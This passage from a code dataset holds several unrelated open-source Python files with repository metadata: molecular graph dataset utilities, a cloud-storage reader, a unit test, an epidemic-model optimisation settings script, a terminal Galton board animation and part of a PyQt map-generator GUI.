with_nans=(filter_in_or_out_samples_with_nans_in_conformers == \"in\"))\n ds = ds.filter(filter_fn)\n\n if is_training:\n ds = ds.shard(jax.process_count(), jax.process_index())\n ds = ds.repeat()\n\n ds = ds.prefetch(prefetch_buffer_size)\n it = tfds.as_numpy(ds)\n\n # Dynamic batching.\n batched_gen = batching_utils.dynamically_batch(\n it,\n n_node=dynamic_batch_size_config.n_node + 1,\n n_edge=dynamic_batch_size_config.n_edge,\n n_graph=dynamic_batch_size_config.n_graph + 1,\n )\n\n if is_training:\n # Stack `num_local_devices` of batches together for pmap updates.\n batch_size = num_local_devices\n\n def _batch(l):\n assert l\n return tree.map_structure(lambda *l: np.stack(l, axis=0), *l)\n\n def batcher_fn():\n batch = []\n for sample in batched_gen:\n batch.append(sample)\n if len(batch) == batch_size:\n yield _batch(batch)\n batch = []\n if batch:\n yield _batch(batch)\n\n for sample in batcher_fn():\n yield sample\n else:\n for sample in batched_gen:\n yield sample\n\n\ndef _get_conformer_filter(with_nans: bool):\n \"\"\"Selects a conformer filter to apply.\n\n Args:\n with_nans: Filter only selects samples with NaNs in conformer features.\n Else, selects samples without any NaNs in conformer features.\n\n Returns:\n A function that can be used with tf.data.Dataset.filter().\n\n Raises:\n ValueError:\n If the input graph to the filter has no conformer features to filter.\n \"\"\"\n\n def _filter(graph: jraph.GraphsTuple) -> tf.Tensor:\n\n if (\"positions\" not in graph.nodes) or (\n \"positions_targets\" not in graph.nodes) or (\n \"positions_nan_mask\" not in graph.globals):\n raise ValueError(\"Conformer features not available to filter.\")\n\n any_nan = tf.logical_not(tf.squeeze(graph.globals[\"positions_nan_mask\"]))\n return any_nan if with_nans else tf.logical_not(any_nan)\n\n return _filter\n\n\ndef _numpy_to_tensor_spec(arr: np.ndarray) -> tf.TensorSpec:\n if not isinstance(arr, np.ndarray):\n return tf.TensorSpec([],\n dtype=tf.int32 if isinstance(arr, int) else tf.float32)\n elif arr.shape:\n return tf.TensorSpec((None,) + arr.shape[1:], arr.dtype)\n else:\n return tf.TensorSpec([], arr.dtype)\n\n\ndef _sample_uniform_categorical(num: int, size: int) -> tf.Tensor:\n return tf.random.categorical(tf.math.log([[1 / size] * size]), num)[0]\n\n\n@curry(jax.tree_map)\ndef _downcast_ints(x):\n if x.dtype == tf.int64:\n return tf.cast(x, tf.int32)\n return x\n\n\ndef _one_hot_atoms(atoms: tf.Tensor) -> tf.Tensor:\n vocab_sizes = features.get_atom_feature_dims()\n one_hots = []\n for i in range(atoms.shape[1]):\n one_hots.append(tf.one_hot(atoms[:, i], vocab_sizes[i], dtype=tf.float32))\n return tf.concat(one_hots, axis=-1)\n\n\ndef _sample_one_hot_atoms(atoms: tf.Tensor) -> tf.Tensor:\n vocab_sizes = features.get_atom_feature_dims()\n one_hots = []\n num_atoms = tf.shape(atoms)[0]\n for i in range(atoms.shape[1]):\n sampled_category = _sample_uniform_categorical(num_atoms, vocab_sizes[i])\n one_hots.append(\n tf.one_hot(sampled_category, vocab_sizes[i], dtype=tf.float32))\n return tf.concat(one_hots, axis=-1)\n\n\ndef _one_hot_bonds(bonds: tf.Tensor) -> tf.Tensor:\n vocab_sizes = features.get_bond_feature_dims()\n one_hots = []\n for i in range(bonds.shape[1]):\n one_hots.append(tf.one_hot(bonds[:, i], vocab_sizes[i], dtype=tf.float32))\n return tf.concat(one_hots, axis=-1)\n\n\ndef _sample_one_hot_bonds(bonds: tf.Tensor) -> tf.Tensor:\n vocab_sizes = features.get_bond_feature_dims()\n one_hots = []\n num_bonds = tf.shape(bonds)[0]\n for i in range(bonds.shape[1]):\n sampled_category = _sample_uniform_categorical(num_bonds, vocab_sizes[i])\n one_hots.append(\n tf.one_hot(sampled_category, vocab_sizes[i], dtype=tf.float32))\n return tf.concat(one_hots, axis=-1)\n\n\ndef _maybe_one_hot_atoms_with_noise(\n x,\n is_training: bool,\n sample_random: float,\n):\n \"\"\"One hot atoms with noise.\"\"\"\n gt_nodes = _one_hot_atoms(x.nodes)\n gt_edges = _one_hot_bonds(x.edges)\n if is_training:\n num_nodes = tf.shape(x.nodes)[0]\n sample_node_or_not = tf.random.uniform([num_nodes],\n maxval=1) < sample_random\n nodes = tf.where(\n tf.expand_dims(sample_node_or_not, axis=-1),\n _sample_one_hot_atoms(x.nodes), gt_nodes)\n num_edges = tf.shape(x.edges)[0]\n sample_edges_or_not = tf.random.uniform([num_edges],\n maxval=1) < sample_random\n edges = tf.where(\n tf.expand_dims(sample_edges_or_not, axis=-1),\n _sample_one_hot_bonds(x.edges), gt_edges)\n else:\n nodes = gt_nodes\n edges = gt_edges\n return x._replace(\n nodes={\n \"atom_one_hots_targets\": gt_nodes,\n \"atom_one_hots\": nodes,\n },\n edges={\n \"bond_one_hots_targets\": gt_edges,\n \"bond_one_hots\": edges\n })\n\n\ndef _load_smiles(\n data_root: str,\n split: str,\n k_fold_split_id: int,\n num_k_fold_splits: int,\n):\n \"\"\"Loads smiles trings for the input split.\"\"\"\n\n if split == \"test\" or k_fold_split_id is None:\n indices = datasets.load_splits()[split]\n elif split == \"train\":\n indices = datasets.load_all_except_kth_fold_indices(\n data_root, k_fold_split_id, num_k_fold_splits)\n indices += datasets.load_splits()[\"train\"]\n else:\n assert split == \"valid\"\n indices = datasets.load_kth_fold_indices(data_root, k_fold_split_id)\n\n smiles_and_labels = datasets.load_smile_strings(with_labels=True)\n smiles, labels = list(zip(*smiles_and_labels))\n return indices, [smiles[i] for i in indices], [labels[i] for i in indices]\n\n\ndef _convert_ogb_graph_to_graphs_tuple(ogb_graph):\n \"\"\"Converts an OGB Graph to a GraphsTuple.\"\"\"\n senders = ogb_graph[\"edge_index\"][0]\n receivers = ogb_graph[\"edge_index\"][1]\n edges = ogb_graph[\"edge_feat\"]\n nodes = ogb_graph[\"node_feat\"]\n n_node = np.array([ogb_graph[\"num_nodes\"]])\n n_edge = np.array([len(senders)])\n graph = jraph.GraphsTuple(\n nodes=nodes,\n edges=edges,\n senders=senders,\n receivers=receivers,\n n_node=n_node,\n n_edge=n_edge,\n globals=None)\n return tree.map_structure(lambda x: x if x is not None else np.array(0.),\n graph)\n\n\ndef _load_conformers(indices: List[int],\n smiles: List[str],\n cached_conformers_file: str):\n \"\"\"Loads conformers.\"\"\"\n smile_to_conformer = datasets.load_cached_conformers(cached_conformers_file)\n conformers = []\n for graph_idx, smile in zip(indices, smiles):\n del graph_idx # Unused.\n if smile not in smile_to_conformer:\n raise KeyError(\"Cache did not have conformer entry for the smile %s\" %\n str(smile))\n conformers.append(dict(conformer=smile_to_conformer[smile]))\n return conformers\n\n\ndef _add_conformer_features(\n graph,\n conformer_features,\n augment_with_random_mirror_symmetry: bool,\n noise_std: float,\n is_training: bool,\n):\n \"\"\"Adds conformer features.\"\"\"\n if not isinstance(graph.nodes, dict):\n raise ValueError(\"Expected a dict type for `graph.nodes`.\")\n # Remove mean position to center around a canonical origin.\n positions = conformer_features[\"conformer\"]\n # NaN's appear in ~0.13% of training, 0.104% of validation and 0.16% of test\n # nodes.\n # See this colab: http://shortn/_6UcuosxY7x.\n nan_mask = tf.reduce_any(tf.math.is_nan(positions))\n\n positions = tf.where(nan_mask, tf.constant(0., positions.dtype), positions)\n positions -= tf.reduce_mean(positions, axis=0, keepdims=True)\n\n # Optionally augment with a random rotation.\n if is_training:\n rot_mat = conformer_utils.get_random_rotation_matrix(\n augment_with_random_mirror_symmetry)\n positions = conformer_utils.rotate(positions, rot_mat)\n positions_targets = positions\n\n # Optionally add noise to the positions.\n if noise_std and is_training:\n positions = tf.random.normal(tf.shape(positions), positions, noise_std)\n\n return graph._replace(\n nodes=dict(\n positions=positions,\n positions_targets=positions_targets,\n **graph.nodes),\n globals={\n \"positions_nan_mask\":\n tf.expand_dims(tf.logical_not(nan_mask), axis=0),\n **(graph.globals if isinstance(graph.globals, dict) else {})\n })\n\n\ndef _get_pcq_graph_generator(indices, smiles, labels, conformers):\n \"\"\"Returns a generator to yield graph.\"\"\"\n for idx, smile, conformer_positions, label in zip(indices, smiles, conformers,\n labels):\n graph = utils.smiles2graph(smile)\n graph = _convert_ogb_graph_to_graphs_tuple(graph)\n graph = graph._replace(\n globals={\n \"target\": np.array([label], dtype=np.float32),\n \"graph_index\": np.array([idx], dtype=np.int32),\n **(graph.globals if isinstance(graph.globals, dict) else {})\n })\n yield graph, conformer_positions\n","repo_name":"deepmind/deepmind-research","sub_path":"ogb_lsc/pcq/dataset_utils.py","file_name":"dataset_utils.py","file_ext":"py","file_size_in_byte":12362,"program_lang":"python","lang":"en","doc_type":"code","stars":11900,"dataset":"github-code","pt":"37"} +{"seq_id":"35232878381","text":"import io\nimport zipfile\nimport structlog\n\nfrom google.api_core.exceptions import NotFound\nfrom google.cloud import storage\nfrom app.store import OUTPUT_BUCKET_NAME, storage_client\nfrom app.gpg.decryption import decrypt_output\n\nlogger = structlog.get_logger()\n\n\ndef get_files(file_path) -> dict:\n \"\"\"\n For survey submissions, intended for the legacy system, SDX transforms them into several different files\n which are zipped up together and then encrypted.\n\n Comments are extracted from the survey submissions and batched up into xlsx files and zipped up every morning.\n The output is encrypted zip files.\n\n This function reads those encrypted zip, decrypts the output and extracts the zip for survey submissions and\n significant comments. Extraction is not required for other types of submissions.\n \"\"\"\n file_dir = file_path.split(\"/\")[0]\n filename = file_path.split(\"/\")[1]\n if file_dir == 'survey' or file_dir == 'comments':\n encrypted_zip = read(file_path, OUTPUT_BUCKET_NAME)\n zip_bytes = decrypt_output(encrypted_zip, filename)\n return extract_zip(zip_bytes)\n else:\n encrypted_data = read(file_path, OUTPUT_BUCKET_NAME)\n data_bytes = decrypt_output(encrypted_data, filename)\n if file_dir == 'seft':\n files = {'SEFT': data_bytes}\n else:\n files = {'JSON': data_bytes.decode()}\n return files\n\n\ndef read(file_path, bucket) -> bytes:\n \"\"\"Retrieve a file from GCP output bucket: {PROJECT_ID}-outputs\"\"\"\n try:\n # get bucket with name\n bucket = storage_client.bucket(bucket)\n # get bucket data as blob\n blob = bucket.blob(file_path)\n # convert to bytes\n file = blob.download_as_bytes()\n return file\n\n except NotFound as e:\n print(e)\n\n\ndef extract_zip(zip_bytes: bytes) -> dict:\n z = zipfile.ZipFile(io.BytesIO(zip_bytes), \"r\")\n files = {}\n for filename in z.namelist():\n logger.info(f'File: {filename}')\n file_bytes = z.read(filename)\n files[filename] = file_bytes\n\n z.close()\n return files\n\n\ndef get_comment_files() -> bytes:\n bucket = storage_client.bucket(OUTPUT_BUCKET_NAME)\n files = bucket.list_blobs(prefix='comments')\n file_list = [(file.name, file.time_created) for file in files]\n file_list = sorted(file_list, key=lambda f: f[1], reverse=True)\n print(file_list)\n latest_filename = file_list[0][0]\n encrypted_zip = read(latest_filename, OUTPUT_BUCKET_NAME)\n zip_bytes = decrypt_output(encrypted_zip, 'comments')\n return zip_bytes\n\n\ndef does_comment_exist() -> bool:\n bucket = storage_client.bucket(OUTPUT_BUCKET_NAME)\n files = bucket.list_blobs(prefix='comments')\n file_list = [file.name for file in files]\n return len(file_list) > 0\n\n\ndef check_file_exists(file_name, bucket=OUTPUT_BUCKET_NAME) -> bool:\n logger.info(f'Checking for: {file_name} in {bucket}')\n bucket = storage_client.bucket(bucket)\n return storage.Blob(bucket=bucket, name=file_name).exists(storage_client)\n\n\ndef check_bucket_exists(my_bucket) -> bool:\n list_of_buckets = storage_client.list_buckets()\n for x in list_of_buckets:\n if my_bucket == x.name:\n return True\n return False\n","repo_name":"ONSdigital/sdx-tester","sub_path":"app/store/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70036994026","text":"'''\nmodule for testing\nmaths.power.py from\npyalgo math module\n'''\n\nimport sys\nimport os\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\nimport unittest\nfrom maths.power import big_power, mod_power\n\nclass TestPower(unittest.TestCase):\n\n def test_big_power(self):\n result = big_power(23, 12)\n\n self.assertEqual(result, 21914624432020321)\n\n def test_mod_power(self):\n result = mod_power(23, 12, 10 ** 9 + 7)\n\n self.assertEqual(result, 278617953)\n\nif __name__ == \"__main__\":\n unittest.main()\n\n'''\nPyAlgo\nDevansh Singh, 2021\n'''\n","repo_name":"4RCAN3/PyAlgo","sub_path":"pyalgo/test/test_power.py","file_name":"test_power.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12436984544","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 9 14:09:22 2022\n\nThis script initializes all the necessary parameters. It also create necessary\ninitial files and a unique output directory to avoid loss of data if requested\nby the user\n\n@author: Jan-Hendrik Niemann\n\"\"\"\n\n\nimport json\nimport os\nimport re\nimport numpy as np\n\n\n# Settings\npath_to_GERDA = ''\nworking_directory = ''\ndata_path = '/data'\ngeopath = 'input_data/geo/'\ngeofiles = {0: 'Buildings_Gangelt_MA_1.csv',\n 1: 'Buildings_Gangelt_MA_3.csv'}\nworld_to_pick = 1 # Version of modeled town (Gangelt)\nn_initially_infected = 5 # Number of initially infected persons\ntotal_timesteps = 49 * 24 # Time in [hours], days * 24\nduration_of_constant_control = 7 * 24 # Time in [hours]\ngeneral_infectivity = 0.175 # GERDA parameter\ngeneral_interaction_frequency = 1 # GERDA parameter\nfd_step_size = 0.1 # Initial finite difference step size\neps = 0.25 # Relative accuracy of gradient estimate\nc1 = 0.1 # Fraction of descent promised\nsamplesize_max = 1e6 # Maximum number of objective and gradient estimates\nsaved_world = 'Reduced_Gangelt_n1096_worldObj.pkl' # Name of GERDA world object\nn_agents = 1096 # Number of agents of the GERDA model\noutput_directory = 'output_'\nrho = 0.5 # Initial trust region radius\nrho_min = 1e-4 # Minimal trust region radius\nresume_iterations_at = 0\nmax_iterations = 15 # Number of iterations\nmax_coarse_steps = 100 # Number of coarse model iterations\nobj_est_MC_sim_init = 100 # Initial number of objective estimates\ngrad_est_MC_sim_init = 100 # Initial number of gradient estimates\nfit_ODE = False # Fit ODE in every iteration\nu_school_min = 0 # Bounds on controls\nu_school_max = 1 # Bounds on controls\nu_work_min = 0 # Bounds on controls\nu_work_max = 0.8 # Bounds on controls\nfast_mode = False # Use ODE with noise instead of Markov jump process\n\n# %%\n\n\ndef get_files(path):\n for file in os.listdir(path):\n if os.path.isfile(os.path.join(path, file)):\n yield file\n\n\n# Create dictionary with settings\nx = {\"path_to_GERDA\": path_to_GERDA,\n \"working_directory\": working_directory,\n \"geopath\": geopath,\n \"geofiles\": geofiles,\n \"world_to_pick\": world_to_pick,\n \"n_initially_infected\": n_initially_infected,\n \"total_timesteps\": total_timesteps,\n \"duration_of_constant_control\": duration_of_constant_control,\n \"general_infectivity\": general_infectivity,\n \"general_interaction_frequency\": general_interaction_frequency,\n \"fd_step_size\": fd_step_size,\n \"data_path\": data_path,\n \"eps\": eps,\n \"c1\": c1,\n \"samplesize_max\": samplesize_max,\n \"saved_world\": saved_world,\n \"n_agents\": n_agents,\n \"output_directory\": output_directory,\n \"rho\": rho,\n \"rho_min\": rho_min,\n # \"max_recursive_trust_region_steps\": max_recursive_trust_region_steps,\n \"max_coarse_steps\": max_coarse_steps,\n \"resume_iterations_at\": resume_iterations_at,\n \"max_iterations\": max_iterations,\n \"fit_ODE\": fit_ODE,\n \"u_school_min\": u_school_min,\n \"u_school_max\": u_school_max,\n \"u_work_min\": u_work_min,\n \"u_work_max\": u_work_max,\n \"obj_est_MC_sim_init\": obj_est_MC_sim_init,\n \"grad_est_MC_sim_init\": grad_est_MC_sim_init,\n \"fast_mode\": fast_mode\n }\n\nresume_work = False\n\n# Ask if new output directory is requested by the user\nnew_out_dir = input('Do you want to create a new output directory? ')\nnew_out_dir = new_out_dir.lower()\n\nwhile new_out_dir not in {'yes', 'no'}:\n new_out_dir = input('Do you want to create a new output directory? ')\n new_out_dir = new_out_dir.lower()\n\nif new_out_dir in {'yes'}:\n new_output_dir = True\nelse:\n new_output_dir = False\n print('Current data directory is', data_path)\n old_out_dir = input('Please enter the name of an existing output directory: ')\n\n while not os.path.isdir(os.path.join(data_path, old_out_dir)):\n print('%s is not an existing directory' % old_out_dir)\n old_out_dir = input('Please enter the name of an existing output directory: ')\n\n x['output_directory'] = old_out_dir\n\n resume_work = input('Do you want to resume your work? ')\n resume_work = resume_work.lower()\n\n while new_out_dir not in {'yes', 'no'}:\n resume_work = input('Do you want to resume your work? ')\n resume_work = resume_work.lower()\n\n if resume_work in {'yes'}:\n resume_work = True\n list_of_files = []\n\n print(r'These are all files Ju_*.csv I have found:')\n for file in get_files(os.path.join(data_path, old_out_dir)):\n if 'Ju_' in file:\n list_of_files.append(file)\n print(file)\n\n itr = 0\n for file in list_of_files:\n num = int(re.search('Ju_(\\d*)', file).group(1)) # Assuming filename is \"Ju_xxx.csv\"\n if num > itr:\n itr = num\n else:\n itr\n print('The last iteration was %g' % itr)\n\n resume_work_at = input('Do you want to resume your work with iteration %g? ' % (itr + 1))\n resume_work_at = resume_work_at.lower()\n\n while new_out_dir not in {'yes', 'no'}:\n resume_work_at = input('Do you want to resume your work with iteration %g? ' % (itr + 1))\n resume_work_at = resume_work_at.lower()\n\n if resume_work_at in {'yes'}:\n x['resume_iterations_at'] = itr + 1\n else:\n itr = input('At which step do you want to resume your work?')\n\n while not isinstance(itr, int):\n itr = input('Please enter an interger!')\n\n x['resume_iterations_at'] = itr\n\n else:\n resume_work = False\n print('Start iteration at %g' % resume_iterations_at)\n\n\n# Create unique output directory if requested by the user\ncounter = 0\nwhile new_output_dir:\n try:\n os.mkdir(os.path.join(data_path, output_directory + str(counter)))\n print('New output directory created at %s' % os.path.join(data_path, output_directory + str(counter)))\n\n # Update output directory\n x['output_directory'] = output_directory + str(counter)\n\n break\n except OSError:\n counter = counter + 1\n\n# Save settings as json encoded file\nwith open(os.path.join(data_path, 'opt_settings.txt'), 'w') as json_file:\n json.dump(x, json_file, indent=4, sort_keys=True, ensure_ascii=True)\n\n# Initialize control\nif resume_work:\n control_U = np.genfromtxt(os.path.join(data_path, x['output_directory'], 'u_coarse_' + str(itr) + '.csv'), delimiter=',')\n np.savetxt(os.path.join(data_path, 'control_U.csv'), control_U, delimiter=',')\nelse:\n np.savetxt(os.path.join(data_path, 'control_U.csv'), np.zeros((int(total_timesteps / duration_of_constant_control), 2)), delimiter=',')\n print('Created control_U.csv with zeros only')\n\n # Initialize Monte Carlo simulation number for J estimates\n with open(os.path.join(data_path, 'num_MC_sim_obj_est.csv'), 'w') as file:\n file.write(str(obj_est_MC_sim_init))\n print('Created num_MC_sim_obj_est.csv with initially %i Monte Carlo simulations' % obj_est_MC_sim_init)\n\n # Initialize Monte Carlo simulation number for gradient Ju estimates\n with open(os.path.join(data_path, 'num_MC_sim_grad_est.csv'), 'w') as file:\n file.write(str(grad_est_MC_sim_init))\n print('Created num_MC_sim_grad_est.csv with initially %i Monte Carlo simulations' % grad_est_MC_sim_init)\n","repo_name":"Henningston/MLoptABM","sub_path":"GERDA_opt_settings.py","file_name":"GERDA_opt_settings.py","file_ext":"py","file_size_in_byte":7508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25644314359","text":"import os\nimport math\nimport sys\nimport time\n\n# ANSI terminal colour codes\nRED = \"\\x1B[91m\"\nGREEN = \"\\x1B[92m\"\nRESET = \"\\x1B[0m\"\n\nX_OFFSET = 2\nY_OFFSET = 6\n\ndef __clear_screen():\n\n \"\"\"\n Hopefully this is cross-platform enough: no guarantees!\n \"\"\"\n\n os.system('cls' if os.name=='nt' else 'clear')\n\ndef __gotoxy(x, y):\n\n \"\"\"\n Uses ANSI terminal codes to move cursor\n \"\"\"\n\n print(\"%c[%d;%d%s\" % (0x1B, y, x, \"H\"), end=\"\")\n sys.stdout.flush()\n\ndef on_init(gb):\n\n \"\"\"\n To be called by a GaltonBoard object when the board has first been created\n\n Just draws an empty board\n \"\"\"\n\n __clear_screen()\n\n print(\"-----------------\")\n print(\"| codedrome.com |\")\n print(\"| Galton Board |\")\n print(\"-----------------\\n\")\n\n for r in range(0, gb.gridrows):\n\n print(' ', end=\"\");\n\n for c in range(0, gb.gridcolumns):\n print(gb.board[r][c], end=\"\")\n\n print(\"\")\n\n print(\"\")\n\n # draw buckets\n for r in range(0, 16):\n\n for c in range(0, gb.rowcount + 2):\n print(GREEN + \"| \" + RESET, end=\"\")\n\n print(GREEN + \"%d\" % abs(r - 16) + RESET)\n\ndef on_ball_moved(gb):\n\n \"\"\"\n Called by GaltonBoard object when ball moves.\n \"\"\"\n\n # delete ball if it has a previous position\n if gb.prevballx >= 0 and gb.prevbally >= 0:\n __gotoxy(gb.prevballx + X_OFFSET, gb.prevbally + Y_OFFSET)\n print(\" \")\n\n # draw ball in new position\n __gotoxy(gb.ballx + X_OFFSET, gb.bally + Y_OFFSET)\n print(RED + \"o\" + RESET, end=\"\")\n sys.stdout.flush()\n\ndef on_total_changed(gb, index, count):\n\n \"\"\"\n Called by GaltonBoard object when total changes.\n \"\"\"\n\n bottom_of_bucket = 4 + gb.gridrows + 19\n\n if index == 0:\n bucketx = 2\n else:\n bucketx = (index + 1) * 2\n\n # animate ball into bucket\n starty = bottom_of_bucket - 17\n end_y = bottom_of_bucket - gb.totals[index]\n\n for y in range(starty, end_y + 1):\n\n time.sleep(gb.pause_ms/1000)\n\n __gotoxy(bucketx, y-1)\n print(\" \")\n sys.stdout.flush()\n\n __gotoxy(bucketx, y)\n print(RED + \"o\" + RESET)\n sys.stdout.flush()\n\n # show totals vertically\n total_y = bottom_of_bucket + 1\n total_x = 2\n\n for t in range(0, gb.rowcount + 1):\n\n totalstr = str(gb.totals[t])\n\n for c in range(0, len(totalstr)):\n __gotoxy(total_x, total_y + c)\n print(\"%c\" % totalstr[c])\n sys.stdout.flush()\n\n total_x += 2\n\n # show ball count\n __gotoxy(2, bottom_of_bucket + 4)\n print(\"Ball %d of %d\" % (count, gb.ballcount))\n sys.stdout.flush()\n","repo_name":"CodeDrome/galton-board-python","sub_path":"galtonboardview.py","file_name":"galtonboardview.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"31606992470","text":"import random\n\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog\nfrom PyQt5 import QtGui\nfrom PIL import Image, ImageDraw, ImageOps\nfrom PIL.ImageQt import ImageQt\n\nfrom MainWindow import Ui_MainWindow\nimport mapgen\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n def __init__(self, *args, obj=None, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n self.setupUi(self)\n self.view_combobox.addItems(\n ['Map view', 'Height view', 'Spoiler mode'])\n self.view_combobox.currentTextChanged.connect(self.updateView)\n self.randomize_button.clicked.connect(self.randomize_input)\n self.generate_button.clicked.connect(self.new_map)\n self.save_button.clicked.connect(self.saveFile)\n self.seed_lineEdit.textEdited.connect(self.setSeed)\n\n # Start the map generator\n self.map_generator = mapgen.Mapgen()\n\n # Set up resizing the map preview\n self.map_preview.resizeEvent = self.displayPreview\n\n # Which preview are we showing?\n self.view = 'Map view'\n\n # Set up the inputs\n self.map_size_slider.valueChanged.connect(self.update_map_size)\n self.biome_combobox.addItems(['rock', 'ice', 'lava'])\n self.biome_combobox.currentTextChanged.connect(self.update_biome)\n self.solid_rock_slider.valueChanged.connect(self.update_solid_rock)\n self.other_rock_slider.valueChanged.connect(self.update_other_rock)\n self.energy_crystals_slider.valueChanged.connect(self.update_energy_crystals)\n self.ore_slider.valueChanged.connect(self.update_ore)\n self.ecs_slider.valueChanged.connect(self.update_ecs)\n self.os_slider.valueChanged.connect(self.update_os)\n self.rs_slider.valueChanged.connect(self.update_rs)\n self.flood_level_slider.valueChanged.connect(self.update_flood_level)\n self.flood_type_combobox.addItems(['water', 'lava'])\n self.flood_type_combobox.currentTextChanged.connect(self.update_flood_type)\n self.erosion_sources_slider.valueChanged.connect(self.update_erosion_sources)\n self.landslide_sources_slider.valueChanged.connect(self.update_landslide_sources)\n self.slugs_slider.valueChanged.connect(self.update_slugs)\n\n # Set a lock to prevent updates\n self.generator_locked = False\n\n # Set the input values\n self.set_input_values()\n\n self.generate_map()\n\n def set_input_values(self):\n\n # Lock\n self.generator_locked = True\n\n # Update each input\n self.map_size_slider.setValue(\n self.map_generator.parameters['size'] // 8)\n self.biome_combobox.setCurrentText(self.map_generator.parameters['biome'])\n self.solid_rock_slider.setValue(\n int((self.map_generator.parameters['solidDensity'] - 0.2) / 0.004))\n self.other_rock_slider.setValue(\n int((self.map_generator.parameters['wallDensity'] - 0.2) / 0.004))\n self.energy_crystals_slider.setValue(\n int(self.map_generator.parameters['crystalDensity'] / 0.008))\n self.ore_slider.setValue(\n int(self.map_generator.parameters['oreDensity'] / 0.008))\n self.ecs_slider.setValue(\n int(self.map_generator.parameters['crystalSeamDensity'] / 0.006))\n self.os_slider.setValue(\n int(self.map_generator.parameters['oreSeamDensity'] / 0.006))\n self.rs_slider.setValue(\n int(self.map_generator.parameters['rechargeSeamDensity'] / 0.003))\n self.flood_level_slider.setValue(\n int(self.map_generator.parameters['floodLevel'] * 100))\n self.flood_type_combobox.setCurrentText(self.map_generator.parameters['floodType'])\n self.erosion_sources_slider.setValue(\n int(self.map_generator.parameters['flowDensity'] * 1000))\n self.landslide_sources_slider.setValue(\n int(self.map_generator.parameters['landslideDensity'] / 0.004))\n self.slugs_slider.setValue(\n int(self.map_generator.parameters['slugDensity'] / 0.001))\n\n # Unlock\n self.generator_locked = False\n\n def generate_map(self):\n if not self.generator_locked:\n success = self.map_generator.mapgen()\n self.seed_lineEdit.setText(self.map_generator.seed)\n self.displayPreview()\n\n # Enable/disable the save button\n if success:\n self.save_button.setEnabled(True)\n self.save_button.setToolTip('')\n else:\n self.save_button.setEnabled(False)\n self.save_button.setToolTip('Can\\'t save maps with no tool store')\n\n def randomize_input(self):\n size = self.map_generator.parameters['size']\n self.map_generator.init_parameters()\n self.map_generator.parameters['size'] = size\n self.set_input_values()\n self.new_map()\n\n def new_map(self):\n self.map_generator.seed = str(random.randint(0, 2 ** 64))\n self.generate_map()\n\n # Save the output to a file\n def saveFile(self):\n\n # Set up the save dialog\n save_dialog = QFileDialog()\n save_dialog.setAcceptMode(QFileDialog.AcceptSave)\n save_dialog.setWindowTitle('Save Map')\n save_dialog.setNameFilter('Manic Miners level files (*.dat)')\n save_dialog.setDefaultSuffix('dat')\n if save_dialog.exec():\n\n # Save the file\n filename = save_dialog.selectedFiles()[0]\n output_file = open(filename, 'w')\n output_file.write(self.map_generator.mm_text())\n output_file.close()\n\n # Set the random seed\n\n def setSeed(self, value):\n self.map_generator.seed = value\n self.generate_map()\n\n\n def updateView(self, value):\n self.view = value\n self.displayPreview()\n\n # Display a preview in the preview window\n\n def displayPreview(self, e=None):\n if self.view == 'Map view':\n self.displayPreviewMap()\n\n if self.view == 'Height view':\n self.displayPreviewHeight()\n\n if self.view == 'Spoiler mode':\n self.displayNoPreview()\n\n # Display a black screen\n def displayNoPreview(self):\n\n # Create the image\n img = Image.new('RGBA', (1, 1), color=(0, 0, 0, 0))\n\n # Display the image\n image = ImageQt(img)\n pixmap = QtGui.QPixmap.fromImage(image).copy()\n self.map_preview.setPixmap(pixmap)\n\n\n # Display a preview of the heightmap\n\n def displayPreviewHeight(self):\n width = self.map_preview.width()\n height = self.map_preview.height()\n square_size = min(width, height)\n\n # Layers\n heightArray = self.map_generator.data[\"height_array\"]\n\n # Find the range of heights\n lowest = heightArray[0][0]\n highest = heightArray[0][0]\n\n for i in range(len(heightArray) * len(heightArray[0])):\n lowest = min(\n lowest, heightArray[i // len(heightArray)][i % len(heightArray[0])])\n highest = max(\n highest, heightArray[i // len(heightArray)][i % len(heightArray[0])])\n\n highest = max(highest, abs(lowest))\n lowest = -highest\n\n heightRange = highest - lowest\n\n # Create the image\n scale = square_size // len(heightArray)\n offset = square_size % len(heightArray) // 2\n img = Image.new('RGBA',\n (square_size,\n square_size),\n color=(0, 0, 0, 0))\n draw = ImageDraw.Draw(img)\n\n # Draw the background\n draw.rectangle([offset,\n offset,\n square_size - offset,\n square_size - offset],\n fill=(0, 0, 0))\n\n # Draw the tiles\n for i in range(len(heightArray)):\n for j in range(len(heightArray[0])):\n # Draw the tile\n draw.rectangle([j * scale + offset + 1,\n i * scale + offset + 1,\n j * scale + offset + (scale - 1),\n i * scale + offset + (scale - 1)],\n # low = blue, high = red\n fill='hsl(' + str(250-(heightArray[i][j] - lowest) / heightRange * 250) + ', 100%, 50%)')\n # fill=(0, int((heightArray[i][j] - lowest) / heightRange * 256), 0))\n\n # Center the image\n border_x = (width - square_size) // 2\n border_y = (height - square_size) // 2\n img = ImageOps.expand(img, border=(\n border_x, border_y, border_x, border_y), fill=(0, 0, 0, 0))\n\n # Display the image\n image = ImageQt(img)\n pixmap = QtGui.QPixmap.fromImage(image).copy()\n self.map_preview.setPixmap(pixmap)\n\n # Display a preview of the wall/floor tiles and resources\n def displayPreviewMap(self):\n\n width = self.map_preview.width()\n height = self.map_preview.height()\n square_size = min(width, height)\n\n # Layers\n wallArray = self.map_generator.data[\"wall_array\"]\n crystalArray = self.map_generator.data[\"crystal_array\"]\n oreArray = self.map_generator.data[\"ore_array\"]\n\n # Create the image\n scale = square_size // len(wallArray)\n offset = square_size % len(wallArray) // 2\n img = Image.new('RGBA',\n (square_size,\n square_size),\n color=(0, 0, 0, 0))\n draw = ImageDraw.Draw(img)\n\n # Color conversions\n colors = {\n 0: (24, 0, 59), # Ground\n 1: 